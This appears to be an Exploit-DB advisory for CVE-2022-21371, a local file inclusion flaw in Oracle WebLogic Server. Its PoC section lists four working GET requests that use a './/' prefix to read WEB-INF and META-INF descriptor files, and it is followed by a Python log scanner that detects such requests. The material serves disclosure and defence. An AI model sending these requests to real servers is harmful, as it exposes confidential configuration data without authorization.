Oracle WebLogic Server 14.1.1.0.0 – Local File Inclusion

  • Author: Jonah Tan
    Date: 2022-01-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50688/
  • # Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
    # Date: 25/1/2022
    # Exploit Author: Jonah Tan (@picar0jsu)
    # Vendor Homepage: https://www.oracle.com
    # Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
    # Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
    # Tested on: Windows Server 2019
    # CVE : CVE-2022-21371
    
    # Description
    A vulnerability in the Oracle WebLogic Server product of Oracle Fusion
    Middleware (component: Web Container).
    Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
    and 14.1.1.0.0.
    This easily exploitable vulnerability allows an unauthenticated attacker
    with network access via HTTP to compromise Oracle WebLogic Server.
    Successful attacks of this vulnerability can result in unauthorized access
    to critical data or complete access to all Oracle WebLogic Server
    accessible data.
    
    # PoC
    GET .//META-INF/MANIFEST.MF
    GET .//WEB-INF/web.xml
    GET .//WEB-INF/portlet.xml
    GET .//WEB-INF/weblogic.xml
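
A log check for the request shape shown in the PoC, as an added example that is not part of the original advisory: it flags access-log entries whose path names `WEB-INF` or `META-INF`, directories a servlet container is not supposed to serve directly, and records whether the server answered 200. The Common Log Format input, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# "METHOD target HTTP/x.y" status, as found in Common/Combined Log Format lines.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PROTECTED = {"web-inf", "meta-inf"}  # never served directly by a servlet container

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jan/2022:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Jan/2022:10:00:07 +0000] "GET /.//WEB-INF/web.xml HTTP/1.1" 200 1532',
    '192.0.2.44 - - [27/Jan/2022:10:00:08 +0000] "GET /.//META-INF/MANIFEST.MF HTTP/1.1" 404 1164',
    '192.0.2.10 - - [27/Jan/2022:10:00:09 +0000] "GET /search?q=WEB-INF HTTP/1.1" 200 830',
]


def normalise(target, max_rounds=3):
    """Drop the query string, then percent-decode until the path stops changing."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def classify(line):
    """Return a finding dict for requests that name a protected directory, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = normalise(m["target"])
    # Compare per segment, ignoring case and ";param" suffixes.
    segments = [s.split(";", 1)[0].lower() for s in path.split("/") if s]
    hit = next((s for s in segments if s in PROTECTED), None)
    if hit is None:
        return None
    return {
        "target": m["target"],
        "protected_dir": hit,
        "poc_shape": ".//" in path,        # the ".//" prefix shown in the PoC
        "served": m["status"] == "200",    # 200: the container returned the file
    }


def scan(lines):
    return [f for f in (classify(l) for l in lines) if f]
```

A finding with `served` set to true is the one to triage first, since it means the descriptor was actually returned to the client.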